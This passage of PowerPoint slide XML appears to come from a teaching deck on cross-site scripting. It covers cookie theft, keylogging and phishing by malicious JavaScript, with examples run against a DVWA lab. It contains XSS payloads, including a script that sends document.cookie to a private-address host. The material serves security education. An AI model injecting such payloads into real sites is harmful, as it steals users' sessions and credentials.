              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>JavaScript has access to some of the user’s sensitive information, such as cookies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>JavaScript can send HTTP requests with arbitrary content to arbitrary destinations by using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> and other mechanisms.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>JavaScript can make arbitrary modifications to the HTML of the current page by using DOM manipulation methods.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17588632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86506"/>
            <a:ext cx="91440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Consequences of Malicious JavaScript</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="1391357"/>
            <a:ext cx="8378371" cy="6801862"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Cookie theft: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The attacker cam access the victim’s cookies associated with the website using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, and extract sensitive info such as session ID.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Keylogging</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>the attacker can register a keyboard event listener using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>addEventListener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> and then send all of the user keystrokes to his own server, potentially recording sensitive information such as passwords and credit card numbers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Phishing: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>the attacker can insert a fake login form into the page using DOM manipulation, set the form’s action attribute to target his own server and then trick the user into submitting sensitive information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14985994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Cookie Theft - Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1391357"/>
            <a:ext cx="8378371" cy="2616101"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;script&gt;alert (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>)&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="6465664"/>
            <a:ext cx="9279467" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pentest-tools.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/blog/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-attacks-practical-scenarios/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="367965491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Cookie Theft - Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1391357"/>
            <a:ext cx="8378371" cy="2246769"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="745067" y="2967335"/>
            <a:ext cx="6112933" cy="1200328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>&lt;script&gt;new Image().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>="http://192.168.149.128/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>bogus.php?output</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>="+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="6465664"/>
            <a:ext cx="9279467" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pentest-tools.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/blog/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-attacks-practical-scenarios/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="338665" y="2469397"/>
            <a:ext cx="7992533" cy="3996267"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="1320837"/>
            <a:ext cx="7738533" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>http://localhost:81/DVWA/vulnerabilities/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>xss_r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>/?name=&lt;script&gt;alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>)&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4551304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Outline</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="1391357"/>
            <a:ext cx="8378371" cy="4893648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>XSS Baseline Scenario</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>What is XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Example of Attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>XSS Types</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Stored</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Reflected </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Dom-Based</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Hands-On Experience</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>How to Prevent XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="121635386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Sending the Cookie to the Attacker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1663468"/>
            <a:ext cx="7941733" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;script&gt;new Image().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>="http://192.168.149.128/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>bogus.php?output</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>="+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="6465664"/>
            <a:ext cx="9279467" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pentest-tools.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/blog/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-attacks-practical-scenarios/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="214794986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Perform Unauthorized Activities - Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="6465664"/>
            <a:ext cx="9279467" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pentest-tools.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/blog/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-attacks-practical-scenarios/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="Screenshot 2019-04-11 at 10.02.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42510"/>
            <a:ext cx="7842250" cy="3244850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="187444195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6465664"/>
            <a:ext cx="9279467" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pentest-tools.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/blog/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-attacks-practical-scenarios/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="Screenshot 2019-04-11 at 10.02.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2" y="1229506"/>
            <a:ext cx="5031317" cy="2081784"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect b="46796"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="677332" y="3652598"/>
            <a:ext cx="7145866" cy="2297650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
